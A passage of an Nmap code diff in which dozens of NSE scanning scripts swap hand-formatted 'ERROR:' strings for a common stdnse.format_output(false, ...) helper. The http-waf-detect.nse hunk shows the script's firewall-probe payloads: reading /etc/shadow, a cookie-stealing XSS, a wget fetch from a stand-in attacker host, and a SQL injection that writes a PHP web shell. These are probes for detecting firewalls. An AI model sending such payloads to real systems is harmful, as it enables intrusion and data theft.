return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-fetch.nse
View File

@@ -133,7 +133,7 @@ local function fetch_recursively(host, port, url, destination, patterns, output)
local status, r = crawler:crawl()
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, "ERROR: %s", r.reason)
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-fileupload-exploiter.nse
View File

@@ -237,7 +237,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

7
scripts/http-google-malware.nse
View File

@@ -53,6 +53,8 @@ local function build_qry(apikey, url)
return string.format("https://sb-ssl.google.com/safebrowsing/api/lookup?client=%s&apikey=%s&appver=1.5.2&pver=3.0&url=%s", SCRIPT_NAME, apikey, url)
end
local function fail (err) return stdnse.format_output(false, err) end
---
--MAIN
---
@@ -72,8 +74,7 @@ action = function(host, port)
local target_url = stdnse.get_script_args("http-google-malware.url") or string.format("%s://%s", port.service, target)
if string.len(apikey) < 25 then
return string.format("[ERROR] No API key found. Update the variable APIKEY in %s or set it in the argument %s.api",
SCRIPT_NAME, SCRIPT_NAME)
return fail(("No API key found. Use the %s.api argument"):format(SCRIPT_NAME))
end
stdnse.debug1("Checking host %s", target_url)
@@ -82,7 +83,7 @@ action = function(host, port)
stdnse.debug2("%s", qry)
if ( req.status > 400 ) then
return "[ERROR] Request failed (invalid API key?)"
return fail("Request failed (invalid API key?)")
end
--The Safe Lookup API responds with a type when site is on the lists

2
scripts/http-grep.nse
View File

@@ -259,7 +259,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, "ERROR: %s", r.reason)
return stdnse.format_output(false, r.reason)
else
break
end

14
scripts/http-headers.nse
View File

@@ -33,6 +33,8 @@ categories = {"discovery", "safe"}
portrule = shortport.http
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/"
local useget = stdnse.get_script_args(SCRIPT_NAME..".useget")
@@ -54,19 +56,11 @@ action = function(host, port)
end
if(result == nil) then
if(nmap.debugging() > 0) then
return "ERROR: Header request failed"
else
return nil
end
return fail("Header request failed")
end
if(result.rawheader == nil) then
if(nmap.debugging() > 0) then
return "ERROR: Header request didn't return a proper header"
else
return nil
end
return fail("Header request didn't return a proper header")
end
table.insert(result.rawheader, "(Request type: " .. request_type .. ")")

2
scripts/http-icloud-findmyiphone.nse
View File

@@ -45,7 +45,7 @@ local function decodeString(str)
return str:gsub("\226\128\153", "'")
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function()

2
scripts/http-icloud-sendmsg.nse
View File

@@ -58,7 +58,7 @@ local function decodeString(str)
return str:gsub("\226\128\153", "'")
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
local function listDevices(mm)
local status, devices = mm:getDevices()

6
scripts/http-iis-webdav-vuln.nse
View File

@@ -151,6 +151,8 @@ local function go(host, port)
return true, results, is_vulnerable
end
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
-- Start by checking if '/' is protected -- if it is, we can't do the tests
local result = go_single(host, port, "/")
@@ -179,7 +181,7 @@ action = function(host, port)
else
stdnse.debug1("PROPFIND request failed.")
end
return nmap.verbosity() > 0 and "ERROR: This web server is not supported." or nil
return fail("This web server is not supported.")
end
end
@@ -200,7 +202,7 @@ action = function(host, port)
local status, results, is_vulnerable = go(host, port)
if(status == false) then
return nmap.verbosity() > 0 and "ERROR: " .. results or nil
return fail(results)
else
if(#results == 0) then
if(is_vulnerable == false) then

2
scripts/http-method-tamper.nse
View File

@@ -128,7 +128,7 @@ vulnerabilities via HTTP verb tampering. This is often found in web servers that
local status, r = crawler:crawl()
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, "ERROR: %s", r.reason)
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-open-redirect.nse
View File

@@ -97,7 +97,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, "ERROR: %s", r.reason)
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-phpself-xss.nse
View File

@@ -133,7 +133,7 @@ PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Refl
local status, r = crawler:crawl()
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, "ERROR: %s", r.reason)
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-proxy-brute.nse
View File

@@ -103,7 +103,7 @@ action = function(host, port)
local status, err = checkProxy(host, port, arg_url)
if ( not(status) ) then
return ("\n ERROR: %s"):format(err)
return stdnse.format_output(false, err)
end
local engine = brute.Engine:new(Driver, host, port)

2
scripts/http-referer-checker.nse
View File

@@ -61,7 +61,7 @@ action = function(host, port)
local status, r = crawler:crawl()
if (not(status)) then
if (r.err) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-rfi-spider.nse
View File

@@ -171,7 +171,7 @@ function action(host, port)
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-sitemap-generator.nse
View File

@@ -137,7 +137,7 @@ function action(host, port)
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-sql-injection.nse
View File

@@ -235,7 +235,7 @@ action = function(host, port)
local status, r = crawler:crawl()
if (not(status)) then
if (r.err) then
return stdnse.format_output(true, "ERROR: %s", r.reason)
return stdnse.format_output(false, r.reason)
else
break
end

4
scripts/http-stored-xss.nse
View File

@@ -183,7 +183,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end
@@ -247,7 +247,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-unsafe-output-escaping.nse
View File

@@ -131,7 +131,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, "ERROR: %s", r.reason)
return stdnse.format_output(false, r.reason)
else
break
end

20
scripts/http-userdir-enum.nse
View File

@@ -41,7 +41,7 @@ categories = {"auth", "intrusive"}
portrule = shortport.http
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
@@ -52,21 +52,13 @@ action = function(host, port)
-- speedy exit if no usernames
if(#usernames == 0) then
if(nmap.debugging() > 0) then
return "Didn't find any users to test (should be in nselib/data/usernames.lst)"
else
return nil
end
return fail("Didn't find any users to test (should be in nselib/data/usernames.lst)")
end
-- Check what response we get for a 404
local result, result_404, known_404 = http.identify_404(host, port)
if(result == false) then
if(nmap.debugging() > 0) then
return "ERROR: " .. result_404
else
return nil
end
return fail(result_404)
end
-- Check if we can use HEAD requests
@@ -93,11 +85,7 @@ action = function(host, port)
-- Check for http.pipeline error
if(results == nil) then
stdnse.debug1("http.pipeline returned nil")
if(nmap.debugging() > 0) then
return "ERROR: http.pipeline returned nil"
else
return nil
end
return fail("http.pipeline returned nil")
end
local found = {}

2
scripts/http-virustotal.nse
View File

@@ -208,7 +208,7 @@ local function parseScanReport(report)
return result
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function()

2
scripts/http-vlcstreamer-ls.nse
View File

@@ -54,7 +54,7 @@ portrule = shortport.port_or_service(54340, "vlcstreamer", "tcp")
local arg_dir = stdnse.get_script_args(SCRIPT_NAME .. ".dir") or "/"
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)

2
scripts/http-vuln-cve2011-3368.nse
View File

@@ -85,7 +85,7 @@ servers to remote users who send carefully crafted requests.]],
local bypass_request = http.pipeline_go(host,port, all)
if ( not(bypass_request) ) then
stdnse.debug1("got no answers from pipelined queries")
return "\n ERROR: Got no answers from pipelined queries"
return stdnse.format_output(false, "Got no answers from pipelined queries")
end

3
scripts/http-vuln-cve2014-2126.nse
View File

@@ -2,6 +2,7 @@ local anyconnect = require('anyconnect')
local shortport = require('shortport')
local vulns = require('vulns')
local sslcert = require('sslcert')
local stdnse = require "stdnse"
description = [[
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM
@@ -70,7 +71,7 @@ Cisco Adaptive Security Appliance (ASA) Software 8.2 before 8.2(5.47), 8.4 befor
local ac = anyconnect.Cisco.AnyConnect:new(host, port)
local status, err = ac:connect()
if not status then
return ("\n ERROR: %s"):format(err)
return stdnse.format_output(false, err)
else
local ver = ac:get_version()
if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then

3
scripts/http-vuln-cve2014-2127.nse
View File

@@ -2,6 +2,7 @@ local anyconnect = require('anyconnect')
local shortport = require('shortport')
local vulns = require('vulns')
local sslcert = require('sslcert')
local stdnse = require "stdnse"
description = [[
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN
@@ -70,7 +71,7 @@ Cisco Adaptive Security Appliance (ASA) Software 8.x before 8.2(5.48), 8.3 befor
local ac = anyconnect.Cisco.AnyConnect:new(host, port)
local status, err = ac:connect()
if not status then
return ("\n ERROR: %s"):format(err)
return stdnse.format_output(false, err)
else
local ver = ac:get_version()
if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then

3
scripts/http-vuln-cve2014-2128.nse
View File

@@ -2,6 +2,7 @@ local anyconnect = require('anyconnect')
local shortport = require('shortport')
local vulns = require('vulns')
local sslcert = require('sslcert')
local stdnse = require "stdnse"
description = [[
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN
@@ -71,7 +72,7 @@ The SSL VPN implementation in Cisco Adaptive Security Appliance (ASA) Software 8
local ac = anyconnect.Cisco.AnyConnect:new(host, port)
local status, err = ac:connect()
if not status then
return ("\n ERROR: %s"):format(err)
return stdnse.format_output(false, err)
else
local ver = ac:get_version()
if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then

3
scripts/http-vuln-cve2014-2129.nse
View File

@@ -2,6 +2,7 @@ local anyconnect = require('anyconnect')
local shortport = require('shortport')
local vulns = require('vulns')
local sslcert = require('sslcert')
local stdnse = require "stdnse"
description = [[
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP
@@ -68,7 +69,7 @@ The SIP inspection engine in Cisco Adaptive Security Appliance (ASA) Software 8.
local ac = anyconnect.Cisco.AnyConnect:new(host, port)
local status, err = ac:connect()
if not status then
return ("\n ERROR: %s"):format(err)
return stdnse.format_output(false, err)
else
local ver = ac:get_version()
if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then

6
scripts/http-waf-detect.nse
View File

@@ -66,6 +66,8 @@ local attack_vectors_n2 = {"?p4yl04d=cat%20/etc/shadow", "?p4yl04d=id;uname%20-a
"?p4yl04d=<img%20src='x'%20onerror=alert(document.cookie)%20/>", "?p4yl04d=wget%20http://ev1l.com/xpl01t.txt",
"?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php'--"}
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
local orig_req, tests
local path = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
@@ -79,7 +81,7 @@ action = function(host, port)
if orig_req.status and orig_req.body then
stdnse.debug3("Normal HTTP response -> Status:%d Body:\n%s", orig_req.status, orig_req.body)
else
return "[ERROR] Initial HTTP request failed"
return fail("Initial HTTP request failed")
end
--if aggro mode on, try all vectors
if aggro then
@@ -97,7 +99,7 @@ action = function(host, port)
local test_results = http.pipeline_go(host, port, tests)
if test_results == nil then
return "[ERROR] HTTP request table is empty. This should not ever happen because we at least made one request."
return fail("HTTP request table is empty. This should not ever happen because we at least made one request.")
end

2
scripts/icap-info.nse
View File

@@ -40,7 +40,7 @@ categories = {"safe", "discovery"}
portrule = shortport.port_or_service(1344, "icap")
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
local function parseResponse(resp)
if ( not(resp) ) then

7
scripts/imap-brute.nse
View File

@@ -99,6 +99,7 @@ Driver =
}
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
@@ -106,9 +107,9 @@ action = function(host, port)
-- authentication mechanisms can be determined
local helper = imap.Helper:new(host, port)
local status = helper:connect()
if (not(status)) then return "\n ERROR: Failed to connect to the server." end
if (not(status)) then return fail("Failed to connect to the server.") end
local status, capabilities = helper:capabilities()
if (not(status)) then return "\n ERROR: Failed to retrieve capabilities." end
if (not(status)) then return fail("Failed to retrieve capabilities.") end
-- check if an authentication mechanism was provided or try
-- try them in the mech_prio order
@@ -129,7 +130,7 @@ action = function(host, port)
-- if no mechanisms were found, abort
if ( not(mech) ) then
return "\n ERROR: No suitable authentication mechanism was found"
return fail("No suitable authentication mechanism was found")
end
local engine = brute.Engine:new(Driver, host, port)

6
scripts/imap-capabilities.nse
View File

@@ -25,13 +25,15 @@ categories = {"default", "safe"}
portrule = shortport.port_or_service({143, 993}, {"imap", "imaps"})
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
local helper = imap.Helper:new(host, port)
local status = helper:connect()
if ( not(status) ) then return "\n ERROR: Failed to connect to server" end
if ( not(status) ) then return fail("Failed to connect to server") end
local status, capa = helper:capabilities(host, port)
if( not(status) ) then return "\n ERROR: Failed to retrieve capabilities" end
if( not(status) ) then return fail("Failed to retrieve capabilities") end
helper:close()
if type(capa) == "table" then

2
scripts/informix-query.nse
View File

@@ -67,7 +67,7 @@ action = function( host, port )
user = nmap.registry['informix-brute'][1]["username"]
pass = nmap.registry['informix-brute'][1]["password"]
else
return " \n ERROR: No credentials specified (see informix-table.username and informix-table.password)"
return stdnse.format_output(false, "No credentials specified (see informix-table.username and informix-table.password)")
end
end

6
scripts/informix-tables.nse
View File

@@ -57,6 +57,8 @@ dependencies = { "informix-brute" }
portrule = shortport.port_or_service( { 1526, 9088, 9090, 9092 }, "informix", "tcp", "open")
local function fail (err) return stdnse.format_output(false, err) end
action = function( host, port )
local helper
local status, data
@@ -77,7 +79,7 @@ action = function( host, port )
user = nmap.registry['informix-brute'][1]["username"]
pass = nmap.registry['informix-brute'][1]["password"]
else
return " \n ERROR: No credentials specified (see informix-table.username and informix-table.password)"
return fail("No credentials specified (see informix-table.username and informix-table.password)")
end
end
@@ -94,7 +96,7 @@ action = function( host, port )
local databases
status, databases = helper:GetDatabases()
if ( not(status) ) then
return " \n ERROR: Failed to retrieve a list of databases"
return fail("Failed to retrieve a list of databases")
end
for _, db in ipairs(databases) do

4
scripts/ip-forwarding.nse
View File

@@ -72,7 +72,7 @@ icmpEchoRequest = function(ifname, host, addr)
return status
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function(host)
@@ -93,7 +93,7 @@ action = function(host)
end
if ( target == host.ip ) then
return ("\n ERROR: Target can not be the same as the scanned host")
return fail("Target can not be the same as the scanned host")
end
if (icmpEchoRequest(ifname, host, target)) then

2
scripts/iscsi-brute.nse
View File

@@ -66,7 +66,7 @@ action = function( host, port )
local target = stdnse.get_script_args('iscsi-brute.target')
if ( not(target) ) then
return "ERROR: No target specified (see iscsi-brute.target)"
return stdnse.format_output(false, "No target specified (see iscsi-brute.target)")
end
local helper = iscsi.Helper:new( host, port )

2
scripts/isns-info.nse
View File

@@ -34,7 +34,7 @@ author = "Patrik Karlsson"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"safe", "discovery"}
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)
local helper = isns.Helper:new(host, port)

8
scripts/krb5-enum-users.nse
View File

@@ -360,6 +360,8 @@ local function checkUserThread( host, port, realm, user, result )
condvar "signal"
end
local function fail (err) return stdnse.format_output(false, err) end
action = function( host, port )
local realm = stdnse.get_script_args("krb5-enum-users.realm")
@@ -368,17 +370,17 @@ action = function( host, port )
-- did the user supply a realm
if ( not(realm) ) then
return "ERROR: No Kerberos REALM was supplied, aborting ..."
return fail("No Kerberos REALM was supplied, aborting ...")
end
-- does the realm appear to exist
if ( not(isValidRealm(host, port, realm)) ) then
return "ERROR: Invalid Kerberos REALM, aborting ..."
return fail("Invalid Kerberos REALM, aborting ...")
end
-- load our user database from unpwdb
local status, usernames = unpwdb.usernames()
if( not(status) ) then return "ERROR: Failed to load unpwdb usernames" end
if( not(status) ) then return fail("Failed to load unpwdb usernames") end
-- start as many threads as there are names in the list
local threads = {}

17
scripts/ldap-novell-getpass.nse
View File

@@ -52,6 +52,8 @@ categories = {"discovery", "safe"}
portrule = shortport.port_or_service({389,636}, {"ldap","ldapssl"})
local function fail (err) return stdnse.format_output(false, err) end
function action(host,port)
local username = stdnse.get_script_args("ldap-novell-getpass.username")
@@ -59,15 +61,14 @@ function action(host,port)
local account = stdnse.get_script_args("ldap-novell-getpass.account")
if ( not(username) ) then
return "\n ERROR: No username was supplied (ldap-novell-getpass.username)"
return fail("No username was supplied (ldap-novell-getpass.username)")
end
if ( not(account) ) then
return "\n ERROR: No account was supplied (ldap-novell-getpass.account)"
return fail("No account was supplied (ldap-novell-getpass.account)")
else
-- do some basic account validation
if ( not(account:match("^[Cc][Nn]=.*,") ) ) then
return "\n ERROR: The account argument should be specified as:\n" ..
" \"CN=name,OU=orgunit,O=org\""
return fail("The account argument should be specified as: \"CN=name,OU=orgunit,O=org\"")
end
end
@@ -76,7 +77,7 @@ function action(host,port)
local anon_bind = bin.pack("H", "300c020101600702010304008000" )
local socket, _, opt = comm.tryssl( host, port, anon_bind, nil )
if ( not(socket) ) then
return "\n ERROR: Failed to connect to LDAP server"
return fail("Failed to connect to LDAP server")
end
local status, errmsg = ldap.bindRequest( socket, {
@@ -106,7 +107,7 @@ function action(host,port)
data = ldap.encode( { _ldaptype = '30', bin.pack("H", "020102") .. data } )
status = socket:send(data)
if ( not(status) ) then return "ERROR: Failed to send request" end
if ( not(status) ) then return fail("Failed to send request") end
status, data = socket:receive()
if ( not(status) ) then return data end
@@ -120,7 +121,7 @@ function action(host,port)
if ( rescode ~= 0 ) then
local errmsg = ( #response >= 4 ) and response[4] or "An unknown error occurred"
return "\n ERROR: " .. errmsg
return fail(errmsg)
end
-- make sure we get a NMAS Get Password Response back from the server
@@ -134,6 +135,6 @@ function action(host,port)
table.insert(output, ("Password: %s"):format(universal_pw))
return stdnse.format_output(true, output)
else
return "\n ERROR: No password was found"
return fail("No password was found")
end
end

9
scripts/ldap-search.nse
View File

@@ -115,6 +115,7 @@ dependencies = {"ldap-brute"}
portrule = shortport.port_or_service({389,636}, {"ldap","ldapssl"})
local function fail (err) return stdnse.format_output(false, err) end
function action(host,port)
local status
@@ -189,7 +190,7 @@ function action(host,port)
if not status then
stdnse.debug1("ldap-search failed to bind: %s", errmsg)
return " \n ERROR: Authentication failed"
return fail("Authentication failed")
end
-- or if ldap-brute found us something
elseif ( accounts ) then
@@ -219,7 +220,7 @@ function action(host,port)
elseif qfilter == "custom" then
if searchAttrib == nil or searchValue == nil then
return "\n\nERROR: Please specify both ldap.searchAttrib and ldap.searchValue using using the custom qfilter."
return fail("Please specify both ldap.searchAttrib and ldap.searchValue using using the custom qfilter.")
end
if string.find(searchValue, '*') == nil then
filter = { op=ldap.FILTER.equalityMatch, obj=searchAttrib, val=searchValue }
@@ -230,7 +231,7 @@ function action(host,port)
elseif qfilter == "all" or qfilter == nil then
filter = nil -- { op=ldap.FILTER}
else
return " \n\nERROR: Unsupported Quick Filter: " .. qfilter
return fail("Unsupported Quick Filter: " .. qfilter)
end
if type(attribs) == 'string' then
@@ -252,7 +253,7 @@ function action(host,port)
if not status then
if ( searchResEntries:match("DSID[-]0C090627") and not(username) ) then
return "ERROR: Failed to bind as the anonymous user"
return fail("Failed to bind as the anonymous user")
else
stdnse.debug1("ldap.searchRequest returned: %s", searchResEntries)
return

2
scripts/llmnr-resolve.nse
View File

@@ -184,7 +184,7 @@ action = function()
interface = getInterface(mcast)
end
if not interface then
return ("\n ERROR: Couldn't get interface for %s"):format(mcast)
return stdnse.format_output(false, ("Couldn't get interface for %s"):format(mcast))
end
-- Launch listener thread

10
scripts/maxdb-info.nse
View File

@@ -126,6 +126,8 @@ local function parseDatabases(data)
return tab.dump(result)
end
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
-- this could really be more elegant, but it has to do for now
local handshake = "5a000000035b000001000000ffffffff000004005a000000000242000409000000400000d03f00000040000070000000000500000004000000020000000300000749343231360004501c2a035201037201097064626d73727600"
@@ -139,17 +141,17 @@ action = function(host, port)
status, data = exchPacket(socket, bin.pack("H", handshake))
if ( not(status) ) then
return "\n ERROR: Failed to perform handshake with MaxDB server"
return fail("Failed to perform handshake with MaxDB server")
end
status, data = exchPacket(socket, bin.pack("H", dbm_version))
if ( not(status) ) then
return "\n ERROR: Failed to request version information from server"
return fail("Failed to request version information from server")
end
local version_info = parseVersion(data)
if ( not(version_info) ) then
return "\n ERROR: Failed to parse version information from server"
return fail("Failed to parse version information from server")
end
local result, filter = {}, {"Version", "Build", "OS", "Instroot", "Sysname"}
@@ -160,7 +162,7 @@ action = function(host, port)
status, data = exchCommand(socket, bin.pack("H", db_enum))
socket:close()
if ( not(status) ) then
return "\n ERROR: Failed to request version information from server"
return fail("Failed to request version information from server")
end
local dbs = parseDatabases(data)
table.insert(result, { name = "Databases", dbs } )

2
scripts/membase-brute.nse
View File

@@ -68,7 +68,7 @@ Driver = {
}
local function fail(err) return ("\n ERROR: %s"):format(err) end
local function fail(err) return stdnse.format_output(false, err) end
local function getMechs(host, port)
local helper = membase.Helper:new(host, port)

2
scripts/membase-http-info.nse
View File

@@ -42,7 +42,7 @@ categories = {"discovery", "safe"}
portrule = shortport.port_or_service(8091, "http", "tcp")
local function fail(err) return ("\n ERROR: %s"):format(err) end
local function fail(err) return stdnse.format_output(false, err) end
local filter = {
["parsed[1]['nodes'][1]['os']"] = { name = "OS" },

2
scripts/memcached-info.nse
View File

@@ -60,7 +60,7 @@ local order = {
"auth_enabled_sasl"
}
local function fail(err) return ("\n ERROR: %s"):format(err) end
local function fail(err) return stdnse.format_output(false, err) end
local function mergetab(tab1, tab2)
for k, v in pairs(tab2) do

2
scripts/metasploit-xmlrpc-brute.nse
View File

@@ -87,7 +87,7 @@ action = function(host, port)
local xmlreq='<?xml version="1.0" ?><methodCall><methodName>core.version</methodName></methodCall>\n\0'
local socket, _, opts = comm.tryssl(host, port, xmlreq, { recv_first = false } )
if ( not(socket) ) then
return "\n ERROR: Failed to determine whether SSL was needed or not"
return stdnse.format_output(false, "Failed to determine whether SSL was needed or not")
end
local engine = brute.Engine:new(Driver, host, port, opts)

2
scripts/mmouse-exec.nse
View File

@@ -133,7 +133,7 @@ local function executeCmd(socket, app, keys)
return true
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)

2
scripts/mrinfo.nse
View File

@@ -251,7 +251,7 @@ action = function()
interface = getInterface(target)
end
if not interface then
return ("\n ERROR: Couldn't get interface for %s"):format(target)
return stdnse.format_output(false, ("Couldn't get interface for %s"):format(target))
end
stdnse.debug1("will send to %s via %s interface.", target, interface.shortname)

2
scripts/mtrace.nse
View File

@@ -344,7 +344,7 @@ action = function()
interface = getInterface(firsthop)
end
if not interface then
return ("\n ERROR: Couldn't get interface for %s"):format(firsthop)
return stdnse.format_output(false, ("Couldn't get interface for %s"):format(firsthop))
end
-- Destination defaults to our own host

10
scripts/mysql-audit.nse
View File

@@ -93,6 +93,8 @@ categories = {"discovery", "safe"}
portrule = shortport.port_or_service(3306, "mysql")
local TEMPLATE_NAME, ADMIN_ACCOUNTS = "", ""
local function fail (err) return stdnse.format_output(false, err) end
local function loadAuditRulebase( filename )
local rules = {}
@@ -103,7 +105,7 @@ local function loadAuditRulebase( filename )
local file, err = loadfile(filename, "t", env)
if ( not(file) ) then
return false, ("ERROR: Failed to load rulebase:\n%s"):format(err)
return false, fail(("Failed to load rulebase:\n%s"):format(err))
end
@@ -120,11 +122,11 @@ action = function( host, port )
local filename = stdnse.get_script_args("mysql-audit.filename")
if ( not(filename) ) then
return "\n No audit rulebase file was supplied (see mysql-audit.filename)"
return fail("No audit rulebase file was supplied (see mysql-audit.filename)")
end
if ( not(username) ) then
return "\n No username was supplied (see mysql-audit.username)"
return fail("No username was supplied (see mysql-audit.username)")
end
local status, tests = loadAuditRulebase( filename )
@@ -139,7 +141,7 @@ action = function( host, port )
status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt )
if ( not(status) ) then return "ERROR: Failed to authenticate" end
if ( not(status) ) then return fail("Failed to authenticate") end
local results = {}
for _, test in ipairs(tests) do

2
scripts/mysql-dump-hashes.nse
View File

@@ -40,7 +40,7 @@ portrule = shortport.port_or_service(3306, "mysql")
local arg_username = stdnse.get_script_args(SCRIPT_NAME .. ".username")
local arg_password = stdnse.get_script_args(SCRIPT_NAME .. ".password") or ""
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
local function getCredentials()
-- first, let's see if the script has any credentials as arguments?

Some files were not shown because too many files have changed in this diff Show More